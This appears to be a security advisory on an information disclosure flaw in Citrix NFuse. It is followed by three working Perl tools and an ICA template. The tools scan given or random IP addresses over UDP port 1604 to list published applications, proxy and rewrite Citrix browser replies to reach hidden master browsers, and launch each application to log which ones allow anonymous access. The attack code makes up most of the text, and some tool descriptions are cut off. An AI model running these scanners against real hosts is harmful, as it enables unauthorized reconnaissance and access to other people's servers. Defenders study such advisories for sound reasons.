source: Citrix Nfuse is an application portal server meant to provide the functionality of any application on the server via a web browser. Nfuse works in conjunction with a previously-installed webserver. If a request for 'applist.asp' is submitted without authentication, Nfuse reportedly will disclose a list of all published applications. There have been reports that this issue could not be reproduced. * The result of this issue is likely due to a session cookie which is not deleted until all browser sessions are shut down. If the user properly logs out, the session cookie is modified such that they must re-authenticate. Citrix-pa-scan: This tool should be used to enumerate Citrix published applications. #!/usr/bin/perl use Socket; $SIG{ALRM}=sub { $connection=0; close(CON); }; $trick_master= "\x20\x00\x01\x30\x02\xFD\xA8\xE3" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" ; $get_pa= "\x2a\x00\x01\x32\x02\xfd" . "\xa8\xe3\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x21\x00" . "\x02\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00" ; $|=1; print "\nCitrix Published Application Scanner version 2.0\ By Ian Vitek, ian.vitek\\n"; die "\nUsage: $0 {IP | file | - | random } [timeout]\ \tIP\tIP to test\ \tfile\tRead IPs from file\ \t-\tRead IPs from standard input\ \trandom\tRead IPs from /dev/urandom\ \ttimeout\tTimeout\ \n" if(!$ARGV[0]); $input=$ARGV[0]; $timeout=$ARGV[1]; $timeout=1 if(!$timeout); if($input eq "-" || -r $input) { open(INPUTFD,"$input") or die "Cant open file $input: $!\n"; $newHost=2; } elsif ($input eq "random") { open(RANDOM,"/dev/urandom") or die "Cant open /dev/urandom: $!\n"; binmode(RANDOM); $newHost=3; } else { $newHost=1; } $loop=1; while($loop==1) { undef $target; if($newHost==2) { $target=<INPUTFD> or exit; chomp $target; $target=~s/\s*(\S+)/$1/; redo if(!$target); } elsif ($newHost==1) { $loop=0; $target=$input; } elsif ($newHost==3) { undef @ch; $i=0; while($i<4) { while($ch[$i] < 1 || $ch[$i] > 254) { $ch[$i]=ord getc(RANDOM); } $i++; } $target=sprintf("%d.%d.%d.%d",$ch[0],$ch[1],$ch[2],$ch[3]); } else { die "Nothing to do? Check input!\n\n"; } # # Get Master Browser # $server=inet_aton($target) or die "Is \"${target}\" a target?\n\n"; $retry=0; $connection=0; while($retry++<2 and $connection==0) { $connection=1; socket(CON, PF_INET, SOCK_DGRAM, getprotobyname('udp')); send(CON, $trick_master, 0, sockaddr_in(1604, $server)); alarm $timeout; $from_CON=recv(CON,$data,1500,0); alarm 0; } close(CON); if($connection==0) { print "$target not responding\n"; next; } undef $master_raw; undef $master; ($master_raw)=$data=~/.+\x02\x00\x06\x44(....)/s; if($master_raw) { $master=sprintf("%d.%d.%d.%d",ord substr($master_raw,0,1),ord substr($master_raw,1,1),ord substr($master_raw,2,1),ord substr($master_raw,3,1)); } else { $master="ERROR"; } print "$target|$master"; if($target eq $master) { print "|1|"; } else { print "|0|"; } # # Enumerate PA # $retry=0; $connection=0; while($retry++<2 and $connection==0) { $connection=1; socket(CON, PF_INET, SOCK_DGRAM, getprotobyname('udp')); send(CON, $get_pa, 0, sockaddr_in(1604, $server)); alarm $timeout; undef $data; $from_CON=recv(CON,$data,1500,0); alarm 0; } if($connection==0) { print "Connection lost\n"; next; } undef $pa; $pa=substr($data,40); chop $pa; $pa=~s/\x00/\;/sg; print "$pa"; # # More packets? # $last_packet=ord substr($data,30,1); while($last_packet==0) { $connection=1; alarm $timeout*2; undef $data; $from_CON=recv(CON,$data,1500,0); alarm 0; if($connection==0) { print ",ERROR"; last; } undef $pa; $pa=substr($data,39); chop $pa; $pa=~s/\x00/\;/sg; print "$pa"; $last_packet=ord substr($data,30,1); } close(CON); print "\n"; } Citrix-pa-proxy: This tool should be used to enumerate and connect to a published application with the Citrix client when the master browser is non-public. #!/usr/bin/perl use Socket; die "\ * citrix-pa-proxy 2.0 by Ian.Vitek\ *\ usage: $0 IP_to_proxy_to [Local_ip]\ \ " if(@ARGV==0); $timeout=2; $server_ip=$ARGV[0]; $proxy_ip=""; if($ARGV[1]) { $proxy_ip=$ARGV[1]; $timeout=4; } $server=inet_aton($server_ip); $proxy=inet_aton($proxy_ip); $pa_connect=1; while(1) { close(CON1); socket(CON1, PF_INET, SOCK_DGRAM, getprotobyname('udp')); bind(CON1, sockaddr_in(1604,INADDR_ANY)); $from_CON1=recv(CON1,$data1,1500,0); ($from_CON1_port,$from_CON1_ip)=sockaddr_in($from_CON1); if(substr($data1,3,5) eq "\x32\x02\xfd\xa8\xe3" && $pa_connect) { $pa_connect=0; warn("- Hey! This is a PA enumerate session.\n"); warn("- Closing. Try to enumerate again.\n"); redo; } if($pa_connect) { warn("PA connect from " . inet_ntoa($from_CON1_ip) . ":" . $from_CON1_port . "\n"); } else { warn("PA enumerate from " . inet_ntoa($from_CON1_ip) . ":" . $from_CON1_port . "\n"); } $connection=0; $retry=0; $SIG{ALRM}=sub { $connection=0; close(CON2); }; while($retry++<3 and $connection==0) { socket(CON2, PF_INET, SOCK_DGRAM, getprotobyname('udp')); $connection=1; alarm $timeout; warn("Sending request to $server_ip:1604\n"); send(CON2, $data1, 0, sockaddr_in(1604,$server)); alarm 0; } if($connection==0) { warn("No connection to $server_ip\n\n"); close(CON1); next; } alarm $timeout; $from_CON2=recv(CON2,$data2,1500,0); alarm 0; close(CON2); if($connection==0) { warn("No answer from $server_ip\n\n"); close(CON1); next; } else { warn("Got answer from $server_ip\n"); } if(substr($data2,0,1) eq "\x30" && $pa_connect) { $data2=~s/\x02\x00\x06\x44(.)(.)(.)(.)/\x02\x00\x06\x44$proxy/sg; $spoof=sprintf("%d.%d.%d.%d",ord $1,ord $2,ord $3,ord $4); warn("- Changing $spoof to $proxy_ip\n"); } else { $data2=~s/\x02\x00\x06\x44(.)(.)(.)(.)/\x02\x00\x06\x44$server/sg; $spoof=sprintf("%d.%d.%d.%d",ord $1,ord $2,ord $3,ord $4); $data2=~s/\x02\x00\x05\xd6..../\x02\x00\x05\xd6$server/sg if($pa_connect); warn("- Changing $spoof to $server_ip\n"); $pa_connect=1; } warn("Proxying\n"); $SIG{ALRM}=sub { $connection=0; close(CON1); }; alarm $timeout; send(CON1, "$data2", 0, $from_CON1); alarm 0; close(CON1); if($connection==0) { warn("No connection to client\n\n"); close(CON1); next; } else { warn("Done\n\n"); } } Pas: This tool should be used to connect to the applications reported by #!/usr/bin/perl $|=1; open(INDATA, "pas.wri") or die "Cant read data file: $!\n"; open(RESULT, ">pas_results.wri") or die "Cant create result file: $!\n"; while($line=<INDATA>) { chomp $line; next if( $line!~/^(\d+\.\d+\.\d+\.\d+)\|\d+\.\d+\.\d+\.\d+\|[01]\|(.+)/ ); $ip=$1; @pa=split(';',$2); foreach $test_pa (@pa) { open(TEMPLATE,"template.ica") or die "Cant open template file: $!\n"; open(ICA,">ica.ica") or die "Cant create ica file; $!\n"; while($tline=<TEMPLATE>) { $tline=~s/IPIPIP/$ip/; $tline=~s/PAPAPA/$test_pa/; print ICA $tline; } close(ICA); system('ica.ica'); $result=0; while($result < 1 || $result > 5) { print "\nHow did the connect to $test_pa on $ip go?\n"; print "1: Wery well, anonymous login, but no desktop.\n"; print "2: Anonymous and vulnerable.\n"; print "3: Login required.\n"; print "4: Error. No connection or similar.\n"; print "\n"; print "5: Redo\n"; print "> "; $result=<>; chomp $result; } redo if($result==5); print RESULT "$ip\|$test_pa|$result\n"; } } template.ica: (Needed by [WFClinet] Version=2 ClientName=testClient [ApplicationServers] PAPAPA= [PAPAPA] Address=IPIPIP InitialProgram=#PAPAPA TransportDriver=TCP/IP WinStationDriver=ICA 3.0 DesiredHRES=800 DesiredVRES=600